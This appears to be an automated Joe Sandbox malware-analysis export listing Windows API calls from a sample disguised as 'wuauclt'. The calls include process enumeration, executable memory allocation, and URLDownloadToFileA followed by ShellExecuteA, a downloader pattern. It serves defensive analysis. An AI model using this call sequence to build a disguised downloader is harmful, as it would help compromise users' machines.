                                                                            • Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorFileLastWrite
                                                                            • String ID:
                                                                            • API String ID: 442123175-0
                                                                            APIs
                                                                            • GetLastError.KERNEL32(00402C69,?,00000000,00000000,?,00406987,00000000,00406C22,?,?,?,?,00000513,00000000,00000000), ref: 00402590
                                                                            • SetFilePointer.KERNEL32(?,?,00000000,00000000,0040699C,00000000,00406C22,?,?,?,?,00000513,00000000,00000000), ref: 00402FC8
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorFileLastPointer
                                                                            • String ID:
                                                                            • API String ID: 2976181284-0
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(?,?,?,?,00000437,00000000,?,?,?,?,?,00000007,?,?,00439C51,?), ref: 00439E09
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: LibraryLoad
                                                                            • String ID:
                                                                            • API String ID: 1029625771-0
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(?,?,?,?,0043844C), ref: 00438565
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: LibraryLoad
                                                                            • String ID:
                                                                            • API String ID: 1029625771-0
                                                                            APIs
                                                                            • CreateWindowExA.USER32(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0040443D
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: CreateWindow
                                                                            • String ID:
                                                                            • API String ID: 716092398-0
                                                                            APIs
                                                                            • CreateWindowExA.USER32(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0040443D
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: CreateWindow
                                                                            • String ID:
                                                                            • API String ID: 716092398-0
                                                                            APIs
                                                                              • Part of subcall function 00404540: GetModuleHandleA.KERNEL32(kernel32.dll,00000002,004047C7,00000000,?,004048B9,00000000,004049BC,?,?,?,?,?,00407553,00000320,00000000), ref: 00404554
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0040456C
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 0040457E
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 00404590
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Heap32First), ref: 004045A2
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 004045B4
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 004045C6
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Process32First), ref: 004045D8
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004045EA
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 004045FC
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 0040460E
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Thread32First), ref: 00404620
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 00404632
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Module32First), ref: 00404644
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00404656
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 00404668
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 0040467A
                                                                            • Process32First.KERNEL32(00000000,?), ref: 004047ED
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$FirstHandleModuleProcess32
                                                                            • String ID:
                                                                            • API String ID: 2774106396-0
                                                                            APIs
                                                                              • Part of subcall function 00404540: GetModuleHandleA.KERNEL32(kernel32.dll,00000002,004047C7,00000000,?,004048B9,00000000,004049BC,?,?,?,?,?,00407553,00000320,00000000), ref: 00404554
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0040456C
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 0040457E
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 00404590
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Heap32First), ref: 004045A2
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 004045B4
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 004045C6
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Process32First), ref: 004045D8
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004045EA
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 004045FC
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 0040460E
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Thread32First), ref: 00404620
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 00404632
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Module32First), ref: 00404644
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00404656
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 00404668
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 0040467A
                                                                            • Process32Next.KERNEL32(00000000,?), ref: 0040480D
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$HandleModuleNextProcess32
                                                                            • String ID:
                                                                            • API String ID: 2237597116-0
APIs
  • Part of subcall function 00404540: GetModuleHandleA.KERNEL32(kernel32.dll,00000002,004047C7,00000000,?,004048B9,00000000,004049BC,?,?,?,?,?,00407553,00000320,00000000), ref: 00404554
  • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0040456C
  • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 0040457E
  • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 00404590
  • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Heap32First), ref: 004045A2
  • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 004045B4
  • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 004045C6
  • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Process32First), ref: 004045D8
  • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004045EA
  • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 004045FC
  • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 0040460E
  • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Thread32First), ref: 00404620
  • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 00404632
  • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Module32First), ref: 00404644
  • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00404656
  • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 00404668
  • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 0040467A
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004047CD
Memory Dump Source
• Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
Similarity
• API ID: AddressProc$CreateHandleModuleSnapshotToolhelp32
• String ID:
• API String ID: 2242398760-0
• Opcode ID: fad7533437dbae3efdf639f17d82456d4a1287e93aada96dda02112028223706
• Instruction ID: c40cfb2cff0e8543d494dcdfcbf93d461de1da01fd97da5991265f8cc755c822
• Opcode Fuzzy Hash: fad7533437dbae3efdf639f17d82456d4a1287e93aada96dda02112028223706
• Instruction Fuzzy Hash: EFC012A261122017CA1066F52C844C3579CC9891FA31404B3B704E7141E2398C105294
APIs
• CreateMutexA.KERNEL32(?,?,?,?,?), ref: 004042C2
Memory Dump Source
• Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
Similarity
• API ID: CreateMutex
• String ID:
• API String ID: 1964310414-0
• Opcode ID: 4e517a16085b8900b141571b75f19e29287a41f7ed24e47c7e5cc36522aeb123
• Instruction ID: 42de1c329415a5983c08d079f819a82d79578491e5c84c113ccbfbe26003380b
• Opcode Fuzzy Hash: 4e517a16085b8900b141571b75f19e29287a41f7ed24e47c7e5cc36522aeb123
• Instruction Fuzzy Hash: 88D01273250248AFC700EEBDCC06DAB33DC9B68609B048429B918C7100D13DE9508B60
APIs
• CreateMutexA.KERNEL32(?,?,?,?,?), ref: 004042C2
Memory Dump Source
• Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
Similarity
• API ID: CreateMutex
• String ID:
• API String ID: 1964310414-0
• Opcode ID: 21e0619b74412fae9514185c35c6bd95fbb7b52f213a822672066e7264c0ded7
• Instruction ID: dbdaa29d8d5ab3acf8359d31fd046521d7a3cbff9559bf3fa2f5df482b1e4750
• Opcode Fuzzy Hash: 21e0619b74412fae9514185c35c6bd95fbb7b52f213a822672066e7264c0ded7
• Instruction Fuzzy Hash: 01C01273150248ABC700EEA9CC06D9B33DC5B68609B048429B918C7100C13DE5508B60
APIs
• InternetGetConnectedState.WININET(?,00000000), ref: 004084A3
  • Part of subcall function 004080C8: DeleteUrlCacheEntry.WININET(00000000), ref: 0040810F
  • Part of subcall function 004080C8: DeleteFileA.KERNEL32(00000000,00000000,00000000,0040819E,?,00000000,00000000,?,004084B1,?,00000000,?,004084C7,000493E0), ref: 00408132
  • Part of subcall function 004080C8: URLDownloadToFileA.URLMON(00000000,00000000,00000000,00000000,00000000), ref: 00408168
  • Part of subcall function 004080C8: DeleteUrlCacheEntry.WININET(00000000), ref: 0040817E
  • Part of subcall function 004081E8: DeleteUrlCacheEntry.WININET(00000000), ref: 00408232
  • Part of subcall function 004081E8: DeleteFileA.KERNEL32(00000000,00000000,00000000,004083C3,?,00000000,00000000,00000000,00000000,00000000,?,004084B6,?,00000000,?,004084C7), ref: 00408255
  • Part of subcall function 004081E8: URLDownloadToFileA.URLMON(00000000,00000000,00000000,00000000,00000000), ref: 0040828B
  • Part of subcall function 004081E8: Sleep.KERNEL32(000003E8,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,004083C3,?,00000000,00000000,00000000,00000000,00000000), ref: 00408299
Memory Dump Source
• Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
Similarity
• API ID: Delete$File$CacheEntry$Download$ConnectedInternetSleepState
• String ID:
• API String ID: 1369373786-0
• Opcode ID: dc49b30eb8cb48e74656dd8cc77bc0eff6cc65cfc1c0bbd4c620f9731a48f245
• Instruction ID: 670bd1f1822fbab38942ef8954843972be358391e24c76c7ecbd6b66639f9f51
• Opcode Fuzzy Hash: dc49b30eb8cb48e74656dd8cc77bc0eff6cc65cfc1c0bbd4c620f9731a48f245
• Instruction Fuzzy Hash: 15C012A011820062D600BBA6AA02B5A668C0F80714F41443EB6C4A60C1EE3C8044822A
APIs
• RegOpenKeyExA.ADVAPI32(80000002,00000000,00000000,000F003F,?,00000000,00404C35,?,?,?,00407E6B,?,00000001,00000000,000DBBA0,00000000), ref: 00404C0C
Memory Dump Source
• Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
Similarity
• API ID: Open
• String ID:
• API String ID: 71445658-0
• Opcode ID: 601bb27103df1dd6ab7ae887f59132927187b2ef7b094d011fc2b20d749a3531
• Instruction ID: c017c2d3cd7702cc40293f0c0b92f299cfcc0552216a4ded47398421e2e7ca9f
• Opcode Fuzzy Hash: 601bb27103df1dd6ab7ae887f59132927187b2ef7b094d011fc2b20d749a3531
• Instruction Fuzzy Hash: 49C08CF03092007BDA0CAA148C03F7E329C8780750F00442DB28096185C66054008129
APIs
• InternetGetConnectedState.WININET(?,00000000), ref: 004068DF
  • Part of subcall function 00406728: ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000003), ref: 004067D0
Memory Dump Source
• Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
Similarity
• API ID: ConnectedExecuteInternetShellState
• String ID:
• API String ID: 3822808191-0
• Opcode ID: 5fe85a0e7d98bcb115740b811f82c610ad9dcd17b5c26daa3db827d2b0b6e89f
• Instruction ID: cb9ba5a357dbf17f807466452ced53c340c992696767b35d6928e3153f41e3a9
• Opcode Fuzzy Hash: 5fe85a0e7d98bcb115740b811f82c610ad9dcd17b5c26daa3db827d2b0b6e89f
• Instruction Fuzzy Hash: 41C08CB110820061D6007B62AD01B5A66CC8F80704F41483E7684E20C4EB3CC444922A
APIs
• VirtualAlloc.KERNEL32(00000000,00020000,00001000,00000040,?,?,?,?,?,?,?,00000007,?,?,00439C51,?), ref: 00439D1B
Memory Dump Source
• Source File: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: 1719246a0053cc99c24b234b1e179e3f801c697a2531001e2cc0710cff91ed1e
• Instruction ID: 794ef5d78045ed4d742bdaeeac8ed0779eb977f76541356490a23fe8d5b0fb08
• Opcode Fuzzy Hash: 1719246a0053cc99c24b234b1e179e3f801c697a2531001e2cc0710cff91ed1e
• Instruction Fuzzy Hash: 3EF0B4B26493207AF124670AAC8BF973F5CDF85B75F00042AF64D5A1C1E4997C10C2BA
APIs
• VirtualAlloc.KERNEL32(00000000,00020000,00001000,00000040,004381FA,004381FA,004381FA), ref: 00438265
Memory Dump Source
• Source File: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: 43f065defaea95145b3ecdcf874f9926135ac585ebd2532a17b86c1669fef322
• Instruction ID: cf7fc80abf0a610b938b0f6de2e472192636330f029e0b36f2c69517e1b1d411
• Opcode Fuzzy Hash: 43f065defaea95145b3ecdcf874f9926135ac585ebd2532a17b86c1669fef322
• Instruction Fuzzy Hash: E5018831A443189BDB359E29CC04BDAB7B1EB44750F2104ADF584B7281CAB4AE808E08
APIs
Memory Dump Source
• Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0
• Opcode ID: 8ae584e4023b59ee75ab96c522648a8cbc719458c716cde17b53aa8cd14c598c
• Instruction ID: 24a9b9a5f53f68d2e9ae0a20dfd92328ab467e55e5b9cffb966d9a0b50497f93
• Opcode Fuzzy Hash: 8ae584e4023b59ee75ab96c522648a8cbc719458c716cde17b53aa8cd14c598c
• Instruction Fuzzy Hash: 48A022C222330002C80022F20CC2EA2808CA2082EA3A000A23000C00A3C82C08800020
                                                                            APIs
                                                                            • Sleep.KERNEL32(000493E0), ref: 004084BD
                                                                              • Part of subcall function 00408494: InternetGetConnectedState.WININET(?,00000000), ref: 004084A3
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
Similarity
• API ID: ConnectedInternetSleepState
• String ID:
• API String ID: 1839875000-0
APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,00000002,004047C7,00000000,?,004048B9,00000000,004049BC,?,?,?,?,?,00407553,00000320,00000000), ref: 00404554
• GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0040456C
• GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 0040457E
• GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 00404590
• GetProcAddress.KERNEL32(00000000,Heap32First), ref: 004045A2
• GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 004045B4
